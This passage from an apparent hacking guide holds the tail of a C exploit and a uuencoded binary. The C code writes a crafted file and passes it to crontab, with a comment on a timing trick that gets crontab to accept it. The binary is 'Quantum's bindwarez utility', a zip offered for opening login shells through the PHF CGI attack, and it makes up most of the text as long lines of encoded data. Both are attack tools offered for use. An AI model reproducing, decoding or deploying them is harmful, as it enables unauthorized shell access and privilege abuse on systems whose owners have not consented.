  7497.  * The sleep is required because as soon as crontab opens the tmp file it
  7498.  * stat's and saves it.  After the EDITOR program exists it stats again
  7499.  * and if they are equal then it assumes changes weren't made and exits.
  7500.  */
  7501.    fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
  7502.    write (fd, buff, strlen(buff));
  7503.  
  7504.    close(fd);
  7505.  
  7506.    execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
  7507.    /* Successful completion */
  7508.    exit(0);
  7509. }
  7510. ----------- cut here
  7511.  
  7512. *********************************************
  7513. * Appendix VI - UUENCODED FILES             *
  7514. *********************************************
  7515.  
  7516. 1. Quantum's bindwarez utility uuencoded
  7517.  
  7518. Bindwarez binary file for use with Quantum's PHF guide for login shells
  7519. in the PHF section here.
  7520.  
  7521. begin 664 binwarez.zip
  7522. M4$L#!!0````(`'>"0B)K$\T.%CD``.QW```)`!``8FEN9'=A<F5Z55@,`"GG
  7523. M]C("$_4R`````.U]>UQ41]+HF6$&!QP<5#1H4$<C$9.(X"MB-,IC$#8((\-#
  7524. MHX8@C!X(`@MG?.2*8@82QLF8B4DV^7:3K*S9;]W-8]W=:$A,%!\!\]B$&'?C
  7525. M%]TLV9CD3,9DW3P0$9E;5=UG9D#-XOV^W^_>/R[\ZO2I[NKNZNKJZNH^/>=L
  7526. M-66EJU0J0?E3"R$"88]I=+,@>$YB\;,$HZ`5XH110I002CA`/=``[()[!"V`
  7527. M!B`$X"0"I"&,A/N1/$W%@?X@#2'L/D%`P/Q")$N/!#SRDD:'T`$5[IHL4+V8
  7528. MKH;`_%,`E5:'X`8<(937,;VB;/7TBM)I%665MHWQM57QB<+Z5(B_FU>[@(>W
  7529. M`.0`+`;(`I@&,!,@%Z`0(!S@)H";`3#_(IYO*<!"?K\$(`W@=H!8@!$`>0`Z
  7530. M@-LXS7*`N_A]&,!D?J_G80CG>RC`?&P;C[\3P``0`Y``,(_'+P-(![``3`+(
  7531. M!I@-4``P7`C\H<R',)$)TWG<,(`)`I?UC_S=&'2/\H[B]S."XL<"F`"2`>;^
  7532. MF_)^[&_,5>)">7C#@/C1`+<"3!D0/Y6'<5<I*Q$@'F`.Q\?S\`Z`<0`10;0I
  7533. M/$0=C.;WLWB8-*#<G_!P%$`^@!%@(H_+Y&'&5?C!/GIJAT:'?(S@]1P''-,F
  7534. M<?Y0KQGMOWS8UNA'-+JUG![;$@=XA8;ABP#$1P+Y49]QW&@HOY[TM9Z7/P(T
  7535. M`G5;=`?H5P'(@-_,R[<"=`/^)L?78?V/!NAMF#\(_U_8GB#\`8`]@'^J8OFW
  7536. M(S__4.H/I[&Z;">S+YC^I(!C)=#>%R%L@O1ZGOXZE@?\;^0X\M4"^%2.OPUP
  7537. M"O`X7O\'V![`Y_+TC[$]@-_$\<\`="`O&\?/`W2"O)F\A@L]$)[EN!%["]HA
  7538. M`Y['T_6`SX7\6WC^$8!G!,E_#.#+@O#Q@&\$/$/%\,D0SE<'ZKL5\"9(WQO"
  7539. MRDL"_"G`E_'\BS#]4XWN3JHO3%@,^!Z>CO39@+<$U9<'^/$@_&[`3P$^A]/?
  7540. MB^T!?#5/MP+>#?B?>'HMX+H@_=@$>'00OA7P.'>`OP=1'H"G\_P[41[N0/\^
  7541. MB_)P*_TO"+]6!?33"/KY(LHGJ/Q]V-Z@\E]#>0!>P?$W`5\$\E-S^7V(\@BJ
  7542. M[^^`IP7)]PN43U#Y7I0/X/_B]-^A?`!?R?%>;#_H;X::X2$0Q@&^DZ>'`3X7
  7543. M<#,O+Q+PC"#]'P7X,L!G<?T?!_A&P&_C^2<#W@3X&8['`]X">"K'YP)^_%$V
  7544. M'K&\%,!/!96_&'#YT<!XS0:\.XB?0L!U,'Z6</M@!3P:\%\H_8OM`3Q/Z5]L
  7545. MS\Y`^8W8GIV!^EV`BSL#_?$?V![`6_2LO%\!_M1.13\%X47`]P`>R?$_8?N"
  7546. MRF_!]@7AA[!].P/V[2VL/ZC__@O;&T3_=W5@?%+_`J[A]@7MQ]=J-IX5_/L!
  7547. M.$ZX>R<$X>`O2-::=27%U>@MS!!JI9J2ZDU"656)5"$4I2W/3EZ2F2JLM4K6
  7548. MRO5"41$D2U451665D*FRN$)85UQ1454""9!<5E-5*4!2F21LJ"F3K%A69<FZ
  7549. M:A9"H3561KVFJMI:*:PIJ:BJM0H2E2T)16L@IU`L63="_J+%63DIR5E%.>GI
  7550. M%E->45YR2I:I2*`D8+@$69TMV"IK&5NKL9+J&F!J#;)HK;"62%BIM::FJ@9B
  7551. M5M>6%M66K45^BXI*I$W5UJ+5`B165@E%F3G0IE)`L'AK2850S7*5VJI!&!56
  7552. M:[5052T5UZQ%&8A5M=+J3<6EI35";57)?5:HA556M+%6*@;>:JW6^X02L6I#
  7553. MI;#Z?FM-%:17EF+.TJIUQ665E<7KK)"\KJH4F,?[XI(2:S5D+\)6,=&5K(%6
  7554. ME=566ZVE`C2IU+I14&2[AK=Q-41#R1+R4$79UU3;BDJJ*J6:J@I60!4K`%*1
  7555. M%@2/]];*BJJU`HD=;_S2JX*^J2BKE;!3JFKN8_T%S0&^L7CHLN(*J0S8+:NT
  7556. M2D654E6Q()5`8K$DU0B44+NIEDH4;=!2:+Q?5M1*P&JM->LYM@;0$H6"8FIY
  7557. MNR`.N*YA<5+-&BH:.U2"]I5L$(I(`4AYL/5EI<!&+6=#Z5C0SJH-UAK62LC!
  7558. M>AE:NA'D9"TMEHI)(6JAUXMK,`K$\\2'*3A&M&/97*>-87.4=B*SM=K9S*9J
  7559. M;V=C3YO/QJC6@KZ?5C<$YS0,H]`?@7`4^L40XEC&<#3ZV!#>@/XMA-'H)T,X
  7560. M!OU9"&$PK\00'--[,03'K!1#<(9$#,%IK<`0',-J#(V"(&$(!F$CAC"Y;\80
  7561. MG/!Z#,%X-6`(SE,3AN`</(SA5%PK0`C._^,8@C/Y%(9@G)_&<!JN92`$)^LY
  7562. M#,%QWH,A..`O8`@._%X,P1%^&4-8,+1@.`O]%`AADFW%$)R/8QB"TW@<0W#>
  7563. MW\40%A4=&`[%-1*$X(2>PA!LZ1D,80'0B2$L4LYB"$95QA`6'.<PC$!_!<)%
  7564. M@O`]AN!\=V,(CGTOAKA@@/X9`HZL!D.85'08PB)%CR$X[)$8PF0=A2$XB]$8
  7565. M@J,:@R$XKD8,?X)^"H2P<(G#$-R@VS"$A5("AK#PF84A+#+F8@B+D/D8YJ"_
  7566. M`B%,1FD8@O.9@2$LJK(PA$EG8?F,JB$[;(\_U_-+B[P"%.B((/AF)P#WOMA9
  7567. MW`_TQ:)6B7CKZ?3!7RQJEXAIG@["4<M$G&(\K82CMHGH2GOV$HY:)QH1WT4X
  7568. M:I^(+J+'33AJH8C+*D\]X:B-(KJ,GFK"42O%18C?2SAJIXCNO,=,.&JIB%.N
  7569. M9Q'AJ*TB3I&>!,)1:\5[$3<2CMHK8H,\D82C%HO5B`N$HS:+Z.)ZSO<ACEHM
  7570. MUE/["4?M%INH_82CEHMN:C_AJ.WB4]1^PE'KQ5W4?L)1^\4]U'["<12(>ZG]
  7571. MA.-H$%NH_83CJ!!;J?V$X^@0CU/["<=1(G90^PG'T2*>HO83CJ-&[*3V$XZC
  7572. M1Y2I_83C*!+/4_L)Q]$D=E/[+R/>0OVOPO83_CKU/^(=A+=2_R/>2O@QZG_$
  7573. M]Q)^G/H?\5V$OTO]C[B;\`[J?\3K"3])_8]X->&GJ/\1OY?P,]3_B)L)[Z3^
  7574. M1WP1X6>I_Q%/(%RF_D?<2/@YZG_$(PD_3_V/N$#X]]3_B)_O1;R;^I_:3W@O
  7575. M]3^UGW`<Y:*;VD\XCG;Q*6H_X3CJQ5W4?L)Q](M[J/V$HQ40]U+["4=K(+90
  7576. M^PE'JR"V4OL)1^L@'J?V$XY60NR@]A..UD(\1>TG'*V&V$GM)QRMARA3^PE'
  7577. M*R*>I_83CM9$[*;V7T(<K8J(>P^>3L+1NHCH\WLZ"$<K(Z+K[6DE'*V-&(WX
  7578. M7L+1ZHA&Q'<1CM9'C$/<#?A3XJ_V;'K[[M\L=WSFZ'2\K3H!_QWV5DWBU_GY
  7579. M^8[/S9:E+3C6#J`!^G.],VVR;C<N60RO:'$V-,LKH4C[,8W\/?`NXN)6#N<Q
  7580. MMT#I,B[_S?(4B%KA>AG]:($'*&`HT'N!XY8#<="O]@5X%:0(MS/$UV$_JK'?
  7581. M(=B^7W'4->>HV^T&?NSGC(4%EG;3.<Q^`#>,VDV=QX&A=JUYA%97<:,6[HPW
  7582. M*'=Y$-<T`N]F&;2ZN!OP;E$DNVO&;+LWJU%:P+<SOS/7(J^[C,SK[=T^0P,N
  7583. M7UP9A^T7IQL>\D!]OLFNVQ[7Z%QS)OQ,H],/@*@GKHP;+,C_C;P*G'N\/W[\
  7584. M&F6>@GCG;/1H#B5"JU_%_:_>/<)W_VEH1)OAT[X`4O%\!9;(-8?3S4&Z(0J=
  7585. M+:(^8C*(;[CG32!R<YH%2!,VD$;M:0ZB24<:W4`:C:<NB";[JC0ZS_(@FH+^
  7586. M-*6,)M(S&VG:M7LNL160)Y;A>Q5\%.+B/9!;M.%E!U[0QY,W]&"O1WJ^@]YW
  7587. MK1?,XN/^I)64I)?GXX#YD*4WHP,X]2AHC"OJ`4=^IWT!"DTP-."&@/V2:DNX
  7588. M'('D_R$0:BL2_\`4S*DVR\]?P@)UC:TVB6+*A?+P<A@CN[N)AS6[/X:RUD#R
  7589. M.)9!W.?GI>,BC*@_81W']&N:D>[!8]Y$UQPJ7GP/!]\2?^FCQ;_X,SX)&<M5
  7590. M,HY_YR(=JP+J596KY:>A6D<[%-CHJQLI7L(RDKJ)NN82ZD"YQF4Z9RY7EZL*
  7591. MY6HL)E(\!;D+9<M%K,G8V%H7)0[]#+*I6;8[+I&,D+[S(F>F;K@8B21_OT`D
  7592. MT4#2;I+19W&[3+*9E]B,K+0A*UU0Y@V8X266X<L>*E/^)10(37NG7"B0=T-2
  7593. M@3P-BBJ4IU"K([U#77,:3V_1RH]`R>71Y5IQ/!;BZ<;JSF)U+M-9LVO5>4NY
  7594. M(-=2QT8#<W'-:`3,XLV?*?):"SG$6S'O-,;`@\C`'/L"TB4IB@LE#"0HR'=3
  7595. MQT6U:],BF<MFD;>"84IL=5E/KKBGR'%NU5'@'6R7>+N_@E"L(-V/7H!:1+,?
  7596. ME1%]P(_^UP62M-CDCVE'@AU^M(4Q>1BD@S9RVSF<+0HL/NV]8/J:\;*['B[`
  7597. M;;1\!L0`-T;Y0W9SD_PVNYDB'XY$S3)ZM?)6<`\-![7B<+#(K9H].MO7VT=5
  7598. M`V(X>(3A?X/46G_J^X!M\&.'NXYHI)CRT&8TM&;Q&Q"9W(9-(,L;"OW;17F#
  7599. MB;Y'HN8!1!L&$/4@T>8!1.(`(AF)"@<051/1:.\0UQQY-RR$FE$<25H)KIN_
  7600. M4;BYP:M#';,'TC?S]`W!Z26!](T\G7@P-)R#OF<T"P,TU?UIT&]LGH^<RI-H
  7601. M(&L:6PV-?Q1P<:=2DES/H"=LD>_M(MOCVH>.(90;1%(@IT*BO#U0W(=H;(Y%
  7602. MPO!8VX]N*"NDL54*XUS87@DBL,A?_:`0Q,OS^C-BD?_L3QQ.\19>VYL0WX+N
  7603. MNNO7W6`45]R#:@ZZIW1(RA7*UZ^#]O\0W$'4+T-O'B`S&CASF#[#N'*:P#O`
  7604. MR@7;4'(>6+K9U2C`8#++G_U`MN%L8BLF\'&@PG'@7*63/X7E\^YE4"Z,]Y'B
  7605. MDS!TFM.H(<MN0;'I#(="S#"J4S5F^?[OE"8/<0I>`\C=B=&/D20TY0O-8GTH
  7606. M#+JCW_M\;=I#<"N4+Q);PR'J/)"P.VH?&A<IT@G3"<7-^):LH1P**_2V1NQA
  7607. M0>GHQ;UH^<I5)%QHA+9E+W!H%EO0!)5#198"5FDYK/*;L1EFSCX^LH$NZ%.Z
  7608. M@+6[6B,(Z"8U]H)A1%G)23<*0I?6`GVCLNEAM(?(J<.IX7"ODMOU9`(FR`?9
  7609. MC5:.A=1V;0;2"Q0U4?Z5GIF'4+=<-)GL0U6P?5@*2-<1G5351?$:*1JLA5<O
  7610. MSV2T2P.T783H)%.7EB9N:8;X!G8(Z8=\`)KK'(7W":V.CWI?127[]B7'\0L=
  7611. MKC2U;S<F$-OR#N)'PTICK5+)Z\B&Z5S/8,LMHC$/%4=OEC\_#Z/E^U!08'$B
  7612. MQBW1+94_.(\DA-;I"^4CY[%_)I=K+#`AJ[A\Z[Y%TUH>)9\]3S>CY=.,3-0=
  7613. MACETN/PNQJO%#[&GJH%UQU$<A*<WCRX7Q$EY.!F48S5RP_<T18EGD/`W5`8,
  7614. M?2D\X*^(GT(2:',?:O/L5&J'O5ME6^=RX<+`X>K&F?69;FJ8!XN)`2)'FT4\
  7615. MAX@!D48WI?X3(_I2(`*XB;:_@;&"-,9)-_4+!6E8(=/)9__)9NC3MF$'OH5,
  7616. MWB$'OH,@L8N2"^2WIS`V%A"3TLCZ.R"O6`_3I46^/X[2G*-$<+4;3T@WN%)4
  7617. MYN;G+J'B(H6L(H77MVLQ#F,23A_$P'&AZ92_7]^^<,+1D;$;RV#JH)+FBT//
  7618. M@KL4@5V]5'[^6T4?''_ME_.="Q\ZGGD<99(WUN<8Q14#?#'<T:Z+L"_`,@7#
  7619. MPSTP&;N>.`6$B:WD-H)6??>\ZXD6B`G&G^J'-^."(8E,E"V,E[5E&.B-X7D7
  7620. MYO3JP3^NTQN>?P-+;C:3X<*%!U(3"UOTH'F&YQN).ISE1%K[@JSA:,7"G740
  7621. M]0966RZX&C$$8];"`B0TET?*7R\"?HZ`>]%X8NMD>X_/!NVB+7]#PP@0`XS4
  7622. M`]^0+GE"?-PW!8X-NZDXP\[6ID:44`,I6A8?S<X(1D/<&'8>;G(1S5N&AC^0
  7623. M^0?C(>*BB0^!GX..[,86D5&L&\T8&&J+:->^P!\>>*/=O-&&'4XU6@YEX<7Z
  7624. M5"O-;<9DLWC+6?]`/W%^$`-=SPK02&-8`<U8L%E,AF+D'Q:0)XQ2WMUXJG][
  7625. M#0W;5$I;6L%R.I?HE\H=("K'$0<I+#;F1-U$YRALC+UGJ*2U]VAMP]NUU-.T
  7626. MFP,%H,_'U&@'^MU=6BQ++4V7+T\$.2Y`'MN&^'RD)M2L-N%;AC'US71$S#6@
  7627. M%'Y*)C%M^R@LH.M(@I1$6SZB#RY-':VRUMZI,I=/%'N42#$M(*D]_PR:+8V^
  7628. M")'6MCBJ#D-I'GQL[':.P_26.$B:>@K,AF''#O0-D,BP/])'U-F.V9AU6P]6
  7629. M8`MK"PGFO"F2(?:>"%M&E]9,1G6AHOEQ5-+VR/J><%N,GQ[C6"[&E-?@YE(0
  7630. MN!2HPL8NPR.X3P!3./14RP#-C*(LM](*O;$5O'<KR%890UIYH0K--72QJV6@
  7631. MNN+^23..N5MI\0^>U([+N.DP=P)TWW=\'2+(4\?A'-EP">?((NZGR%%`(SNC
  7632. M<#1@"3X:N\Y1SXW6ZO9N!6NFWJYN4@5\=_DL.!#RBBOHCR%]S%7H7QX_D/0D
  7633. MDHX-)@4Z9H?%I8'./O#UOQT6SKI>9:Z7CX\<6,^[6(]F0#T6SSLP%("WEHH)
  7634. M*"\D)2TY`M$TJ`S[HWTT;'_B&(6R;U[6JP$2G>&A=1K<^VB,^S7N?:R%ZPL`
  7635. M60!S]VATU0`K?ZO1E0)4`$B_Q;T8S(N#J/&TH2%7@ZO@<$-#)MQLNT2Z-YR1
  7636. MH#7RS-#0.+L481O)U$YC"V?)^%R;^K<IFC7.$TJT+GL4[C%UCS0\]'@(\7:,
  7637. M>%,!+WJ`:(#O?Z/1Y?R6P3*XG_N?&ET4P&:`90#ZWS#`]*<@?!G@&,!)@+,`
  7638. MDZ$,Q3\99A'O18,3%TLSGOPZ>+R>L2$D3TYC:,"'[YQ.8'2>5C(9_<LX.YF5
  7639. M@=.\YZ_JX#+\-*V<ICH&=.Y+\,2:7QB-ZBV-W![9<$**8#*)9#*1:T"]^:@;
  7640. MC"7B[*[`9]G?HJ%9AU4N855ZTB#:/9"?!,Y/)SB1<N%P[,4+V(M#FL\`7UYM
  7641. M\UD(D#5#@T:M=%FD!X^^75'6V9NH+#ZWC(`2=^.\%+Q<:!B!YEGC02_?S32!
  7642. M-OJT9M2JH:`&Z-."W%@:[F!YO@[0XHDIS]\"..Y<>?X<P.G1R1LJXJV,K<KP
  7643. MX(C\$E@33QK&RW?@;1+9?]D'=L,SC>[[Z^(8BN,*'<G*QB?QGF(LHQF972!$
  7644. MP,"RX^8X9L,H3RKC?=LEM/^&!MQ<965(*P-Y:L=19R(>%*E3"J$X>VO?;@QW
  7645. MY_72]B<7CCPZ3!""AM?[O<PO"!03YB\[(%S/"SC6`C3CKU8_9#P_"`:>T"D,
  7646. MD&^0[[;(_\";T;#6!/7P#K/(<Z#3O*$6^>XAP:30Z=XIM/]V/Z@*K%%R9##P
  7647. MF,IBY.F?TT;'*1E-)!JIQA.&1W"?V;FJ-V![<<%GK],+4E+]@?D&=+7"NNS,
  7648. ML!1LIQM8A639+X7:PNMC"P"]X`USZW5-E-1GQRP6<4ZOWR)/E97I-\3OD$1*
  7649. M0RWB8\C32/0$6/5HSVFYF=B5Z`M2_%\BG==(BK^=RH=I[[:F(WUO-SV&V'R5
  7650. M-)YS*.DT?4U$PGDW-*+NL52=H5%+.XQ3#`^=QF>#DY]Y_7<:G7OE\V!W`1X!
  7651. MV,%#A%-!]_\=V/%OTA#JKT&+N'Q3!*XAY1A8G,F+X3X=>SH&QF.6HB2&^@@!
  7652. MQ!52'Z'#(+VQ2QI>[Z1&E\,:ZF:PEM[)K&\`]T:Y<5]U=*``6OS%D`[I6#Y-
  7653. MHT]2^SYR6;]7-N'F!.O&+0-U0UJLZ(:T8/*%_LIP1T`98KZXAC*\B)T<.L&O
  7654. M#`%=#-*$`TB$>Q'_7A-L5VK"MB!-:)`43<BF1Q//'']!@WM/&U_4Z$0`_4O]
  7655. MP7V5N/\3:/TWY9R$]*<YC3R`MO=%M!-9BF5Z`N<'&0\`@).&!W+E6X<R([#%
  7656. M-8>/3,_C0+1=B[HQN5>O:J*[[5J='\<[;[9K3O`$@OM'WGG]XW"OSWMS_SC<
  7657. MW_..Z!^'>WI,$9J.U/_C0M-CI!,P+E$-#\#$7[\;8R[Q7G8/T*F,R""=4MD4
  7658. MG5+;%NC5BDXAC45<%-"IXY]=0Z?>0G7Y8\P`G>(F)DBM/D*Z[3%<K;#\@%HA
  7659. M%E`K%3,P&,F9-31:_&JE-C2F*VHUAJE5S.\UNG<!7@>(WPN^$0^_@?![?C]8
  7660. MT%T'[?6`?%1']N7IH3B[P)S])X:_"[C\D8[;F[O`WJSDYB+=NX#6!A9Y?I_2
  7661. MI;W>/(BKCUB-@B@7RD?(^+R>X2JY(XK4]&^TOZ0'\S2"F1DU%G(!]`+6/JQK
  7662. M,0)/[[%TE<O:S;;FKK`__77%;W_48'\N]]<54T!7GO[T&KKR&>K`@V-_W/[\
  7663. M"XF*QPY&46Q7*@J>1U84I6$7>[@E3=JJ:SPMZ;WKT8</D6[UKG/+,X>0L++"
  7664. M>7_<Q/#>,+3_0]@83W?-V4X;DCC.+C>-PML]*DD/D@^13_31OE1]+,;V-6.W
  7665. MS5+MQ@"\X`3:O[2#7^.-=0?&ZF4^5E5LK#[B[]B^H+%:8%&D,5&^#+WD'$7N
  7666. M#'HP4SOLK6IS;OE\^>4QU,GDY!CV"\SEL;=>LG=/,CR4R59#L_X(ZZ"7-;KU
  7667. M^_]G0/K3M=,F0SVM?PS@YP?4NV@?KE6JF2_[6UP1#3!\U)(D+;;2\&!3")Y$
  7668. M9XUJ:#4T;@SAGI_R)'+,&=JJ=!RE6(5T_FV2T3D*BV"^;5*'P;X@J*CYM]F^
  7669. M[%>/,00[G179=IJ*-%O*C?)X$*`G)(3\;_Y4Y`=U?YZK!_)\4MV?YV.TR82[
  7670. MY5EJK:X%+PLDN-2F!F5;/X=V/JB#\4A?5YI9!<K1C,?UG%%NVFS'512&V^C1
  7671. M`A91\P8EM`57X,G#A=H<OK-M:#"IN<B<$5A1TG&#?09$@:XXCA[^3!?D(V/2
  7672. M#2PI[.B`>%S%8)8CA_\Q,,M9EA1VA,7G6LHGR'BZU_..?VVAB.951LH(&UL-
  7673. M#7BT!9?VC;^DY6<^#F9#`YY%EW^/ITJ:V%J&V*?^Q)[$H^[!`BY1]>\1G"K;
  7674. MU&!4*9]9]*$AZ3BM+)/X^D+A*;8_3[81`V=8;YB]&R:;R\JB(\#(5T(P(U(8
  7675. MU[4:;[\*CN$V;9OCV\33@?'9K9)&;$7[$..M`%O4K99RO"5N8-HY#M,='WN7
  7676. M`9^`%\B/*(_>I'%@NR++598".8145(_/D`ODGYVB357G;,H)U7AC^K=Q_3A_
  7677. MQ4WJE&#>'BKW^7Q4RU1_+=%0RS"JY9F/P6J%05D%\@RHPS\YH&TJ%\1+Z,I.
  7678. MDB\IC[?(ABO/L>2L8<J3(U];HPJN/6V-:@BT;8TA]#CI"0T$"6\9]A_NJB<S
  7679. M+8UI4U]*:0I/J;]XWJ9I4Y^'&Q_>^%+\1#HDNGQUHK[#]1>GK/\]V[_42:/:
  7680. MU#TI;>J)*=OIT1"T'*F1$$/V-,OQUZF?`*_'T)_[103--/X)J,!2?J=<`#.I
  7681. MO"WBRN=6_J=Z=,Y'ATNI.IUSE=YIBY0_Q=G&-T'2V7U&::%WE=LQ;@]VS>SG
  7682. MJ&L/_R/2\(JI.ZS#8>IVG%\#5Y>IVRQ&Y2F/R^2S?V7=>Q/(U#'N:<J["ZX%
  7683. M\B<:?$KS'%SEY]D"0OY,#]Q9S_&%@]O/CXR_G#N(;+[:-%JK>^U1N!QZ'"X'
  7684. MT*MP%^86./)['4NZY9_AMJX=:9Q+NMO2QJ@%N(30;G5^K_V(SMZNLQ_5I=O[
  7685. M1FQY.U`1K1]%7&ISIJ?_E\]W:#+@!S&REP[8?/=K4!H_??ED$=,IDWS^+\J3
  7686. MRQ$44:XT_@*4$]`G9[[>N232:=)EV+N'&Q[:3XY>H^Y56C_L>DVC0W@*T$7\
  7687. M'F$OX&:`97`O0E@/T`T0"7@<P'&X[P2HAOLF@.W:41&H(>TJ#/&7#M2U[NW:
  7688. MD3Q^Y(#X*!X?-2!^.(_'L&5U('X$CQ\Q('X,CQ\SH)RQ/'[L@/@)/'["@/AQ
  7689. M/'[<@'@CCS<.B!_/XS%LF12(OY''8]B2$HB/X?$Q`\J9R.,G]HL'B]*NHH-S
  7690. M(?YGW_ZXP#-O^[DTT%,Q_G.83#(N0Y?)]WWD\]&M*T/G6/*Z:V-88A=Z?P\F
  7691. M`8USR>M-JK8A"<Y11&%J!?]')3]UDNO1Y@6)IT$GMMM_`K1-0\K5O,R'/L('
  7692. M*?C@\,268137MD@K.3J\(]RI]DN&+>^!9ANV/,T."%CW!H^C.IT@#:V/T$/C
  7693. M=!AIC\7;"_W3[;&HOG_'R/H(O#7V2Y_0K(.XV/?!>N@3=N.]/58#USZNXY0\
  7694. M^?T(//1*R?41F*SLA3=CB8=E[2R5O=,?AP3^"#9.*"X6?Y6X`"^&QUMC?7[9
  7695. M*[P8ME'92$`\;B-.?%_R`8=TS7JJ+RRX/IZ7&N^[S(C=VT@L>'@GD%<@'E3!
  7696. M\X$S'SP>D+E]`5Y]DCXIL@[<4YU]KL_VO7.1QLRLP8D/@W@89)X[@_.`S0.#
  7697. MK1970.?+C_^%'<[2-7;YGVT7R#L^P$-8>\CN1'+EZ*.Y&2>^KKHH%L=W>^>&
  7698. M,?,:14]!T7(+^+04#;D@W5:N<ZWJMLAWG0!]Q2BPXCW-S[&;;@O9\@)YW`=T
  7699. MV(HK$.M7#0FI_EU5_=E_[B;KN8O<CJW:EOI8/'[:2ZL)3?/3_:/_`-%R2P^V
  7700. MX`&!/V[WV4:*I9_[3X<\J`OL5H-'L27,+!\XR0I#RXI1H69Y#T0YSKNLYP-S
  7701. M&:Z[RFF!>1]P3,>7+?(NO%73K>DDGE:IT](0&;"7(,]EB2/%R@`GO4/8<0U!
  7702. M'$:G"J(Z^!@%L@T!LK\P,O`WAF+E6XA*A^NTH>!_R)4*KI9&EZLM\CU^?$NH
  7703. M1>[\$)^1]UL_TB1,,_!-)_!P0^-IJ*\A4)_57]\PVH)[XWWP;V+H_!]@OP=,
  7704. M_B.H=T$A*&"NC#_^#FS(47L/9.#TY4`5>Q2H=R,*$UB$O?4RW1_(@DL[VCSP
  7705. MQ_'D,48.W&\%_L2'/\<5C/P<:E^[N/-S/%'X)"&60GD'BWV"8K<1@B?J_@.K
  7706. M'?N^<ACC#A81!A'F0IKK643W>Z3?]7.GV:++1XK/8DTJ>48';4:CON*9K\<0
  7707. M%<0_0J+X"N;Z!^02#P5$-2\TN/%L'R<?_9O&$[8)Y0E$CT85']W=U:[&']W;
  7708. MCVC:<080'!_8YX%=A'KLAS7V),'6[:SI=6GV89JJ(^FP+=%^I->I=E6'.V;8
  7709. M6_7F7#FM`TN#HD,36[WCP1\^H@ED<66I3SG&M"=KJ.R.P!:%LK\TFZ:#>[06
  7710. MN6."XL2.%)_"MN'%(K](T7H1G0<^[H^\AP(H5]!:0-O2M=7!)+_L3V(FN<;!
  7711. MM,(D5,TD>K&#G6,L5`Z$S!!?^=*_`?*+CL&<#PHZOB%IY9$A5SG7@/P&G6L(
  7712. MAYJW=E!?PHH%._BGR(?"PTRS>"S`Q.C!,*$/'(.0-_T#31Y[ICWF:F?5Y4*@
  7713. MX`]VR?9.1M6V@4WL="OG5O[>^]WSAN=MG6*>#_H`!>E*5YGEM\;S,R)X/B2,
  7714. MGP^1WFX\41<I_AUY9D[@:R`$PVY;IV%G:T.K;0BH!?I[Y'2[K!U!8[+0XAQ'
  7715. M3]7'T5/UTUNJF1#"I)D6\8N`$(:_/_@#'#HIRD*'9,QBWY=XQI@V*_4\CG/8
  7716. M^2X[/Z4'*S.ZF0YF=`^59MF[-=)T&-K%E_E!&]6IW4'G;:*"#_PK@D655L89
  7717. M>+KU<WV2=A'BAOUFU;8>/&8A16V>L:T'9ZNMM]A;0[C^N\QJMV&_.F4!/=;[
  7718. M@6[Q29WM*T<'^2NMZH"OI8$^.H2_)7#-*91W^M@,J4F:C<I7HW5<\'K<[:9>
  7719. M)$BBLR+KK?4+?3:S8?]BE3:,'F&KUJ<X^@KD@D!>HAM9?Z?/-LRP/]U/M^%C
  7720. MQW=3+X'%Z,TME#>`H%1@`R_@BN8Y=Z$\VL=.<6N\/Z/GHLJO'8"<G8QJU^+3
  7721. M7QK[.$T5!;?!PH]7?7CK.#J#<=JPXS\%Y<FU2DJUB"I9`]9[XI_])[$^2FA5
  7722. M^OO"!XXEO:Z50WT!%6!1>>'^4UEZ)SU\;GQ+`O6D1S:V&RTT1!77X/.W>==[
  7723. MXUUSG*,PR?'.U`_Q,'T8J'FJS^S5N&$&R^7TL]_V'[6KNR%PB"?#WJ.14D%7
  7724. M9N-#02I&];&#PJ11R,*&\(`DDH@[U!_E)R$!P:&A#K+3-K33=+CF5B)..E6G
  7725. ME=\`_\'"QD*!?!884M$9G'YK>EB[L[.8.$N9]&9Q#(C2M0\/]!7('>_`:KW5
  7726. M<2%XZ&2889GYT5MD"#N/4^!YQW^N6T/G68D;&A]F>3[0F"UB'!;[#!9KD3>]
  7727. M@P=&Y2WL=.XE98E-/ATS*C"E'W@8Y]T7T.D;\Q:;`+ML<P\F0CG>1/3Y0^??
  7728. M)(7.7R2%>Z/PQ0N_P[4,:6J6A32&+O5KW]M"FD-1MEYZ'`J1)Z?5W"K8_
  7729. M$UD+QDP]92ZTR,U0KC<4]UQ"A#8MQO>?_U`F>*!PA.%@B#F5]LR!#8BQ?=//
  7730. M!X%9LGFCFNW581B0[?<"DZT)U[S:W9@(Q/7S!$-#!9WZB\9Q\03^SA#BMZOG
  7731. MQTHW&`ZVFE,<^3KY5^QW2IXY2#G'9](1B>8T$-B[EQH>NI$=+3$>IW7QNV]I
  7732. M=(GO_-^!4_\7ZT9X>D#];L#GOMT_+NHJ^6(`]``BSS\9H'PZG_P_:U-^J:)G
  7733. M,9Y?X=[F(K/GYQB*J)^>1VBOTK7J*8L\\SCJ]M_:0=W%E3#_E9>Z5CUMD5^G
  7734. MZ)?H9ULQGK5$7QXKOXE'=`KP"&`]GG@D%<B5#4J=AH<70%K]&Z@?H"SXZT?G
  7735. M/J0Y-$,._K&3H6$4))7'RS8H3RDEF2K3>7`2<8M)D$&\`R[RQ'9FD]""-OP-
  7736. M=XK0AP/=L<AM[:1K]+,RW!NR]X7;QMF[;[)%6^3?^=.DO]J[PVU?>]]'/Z\[
  7737. MUG9[6R,>=(JUR`\&:.YN:AQ%&X!H\]$%(!JS[.TEKKP[<>\SW#:Z/,+1J(<4
  7738. M^;5>MI=)F)E'_AHB60Q-.Y[E<.>VR#M`0-Y99!:\H]WBWF$0#G.+\1B&NL4J
  7739. M".445AX;,#C6&O%WE:Y?X^9?O]^[%#J7`(G>WC-EPW"GYHE[^Z"3EXJ+T<),
  7740. M=KL>X&>X*&UE3R!-Y\Y=*N;(?C?C=VV#/1!'\UD"&(3M^;J#2.8_[=0Z4A#P
  7741. M>-+OH#=?70EEU_?,MVE?+82[I6)QH*X[VZXUQ9WJ-Y_9ZR+5AAWX(U?GJD@\
  7742. M@+I?BNXS[%\9[7.L.KFMCWP'O7+$)Q'5L):FT$_>'%3Y.GL?R6P?R4RTD\A@
  7743. M'#P8)+-])#.6!OY'@?@0U;#Y35H77D-@>6JECKJ34S:,=*XZZ8QY!BNQB$XL
  7744. MZ!:WTW12J]0R$A"GII%51.GA;LAB$7=05<.#J[IZ>_)/L>K$1R&'<]4IBWSF
